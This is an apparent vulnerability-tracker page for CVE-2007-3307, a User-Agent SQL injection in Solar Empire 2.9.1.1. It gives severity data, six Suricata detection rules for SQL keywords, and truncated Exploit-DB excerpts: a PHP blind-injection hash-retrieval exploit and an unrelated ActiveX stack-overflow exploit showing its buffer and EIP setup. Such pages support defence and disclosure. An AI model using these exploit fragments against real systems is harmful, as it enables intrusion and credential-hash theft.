CVE-2007-3307
published 2007-06-21CVE-2007-3307: SQL injection vulnerability in game_listing.php in Solar Empire 2.9.1.1 and earlier allows remote attackers to execute arbitrary SQL commands via the…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.7th percentile
SQL injection vulnerability in game_listing.php in Solar Empire 2.9.1.1 and earlier allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solar_empire | solar_empire | <= 2.9.1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UNION SELECT
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UNION SELECT"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"UNION"; nocase; pcre:"/.+UNION\s+SELECT/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006480; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php INSERT
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php INSERT"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"INSERT"; nocase; pcre:"/.+INSERT.+INTO/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006481; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_nam
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php DELETE
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php DELETE"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"DELETE"; nocase; pcre:"/.+DELETE.+FROM/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006482; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_nam
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php ASCII
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php ASCII"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"ASCII"; nocase; pcre:"/.+ASCII\(.+SELECT/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006484; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_nam
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php SELECT
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php SELECT"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"SELECT"; nocase; pcre:"/.+SELECT.+FROM/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006479; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_nam
Suricata
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3307 [HIGH] ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE
ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE"; flow:established,to_server; http.uri; content:"/game_listing.php?"; nocase; content:"UPDATE"; nocase; pcre:"/.+UPDATE.+SET/i"; reference:cve,CVE-2007-3307; reference:url,www.milw0rm.com/exploits/4078; classtype:web-application-attack; sid:2006485; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name
Exploit-DB
Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve
exploitdb·2007-06-18
CVE-2007-3307 Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve
Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
Special Thanks to all the guys of milw0rm IRC channel for theyr help
";
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
el
Exploit-DB
ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
exploitdb·2007-05-04
CVE-2007-0976 ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow
---
'----------------------------------------------------------------------------------
' ActSoft DVD-Tools (dvdtools.ocx v. 3.8.5.0) Stack Overflow Exploit (MoAxB bonus)
' url: http://www.activex-soft.com
'
' original advisory: http://www.shinnai.altervista.org/viewtopic.php?id=41&t_id=30
' http://www.milw0rm.com/exploits/3307
' author: shinnai
' mail: shinnai[at]autistici[dot]org
' site: http://shinnai.altervista.org
' Tested on Windows XP Professional SP2 full patched, with Internet Explorer 7
' This exploit was written for working on Windows XP Professional SP2
'----------------------------------------------------------------------------------
buff = String(380,"A")
get_EIP = unescape("%EB%AA%D7%77")
buff2 = Stri
No writeups or analysis indexed.
http://osvdb.org/36303http://secunia.com/advisories/25716http://www.securityfocus.com/bid/24519https://exchange.xforce.ibmcloud.com/vulnerabilities/34909https://www.exploit-db.com/exploits/4078http://osvdb.org/36303http://secunia.com/advisories/25716http://www.securityfocus.com/bid/24519https://exchange.xforce.ibmcloud.com/vulnerabilities/34909https://www.exploit-db.com/exploits/4078
2007-06-21
Published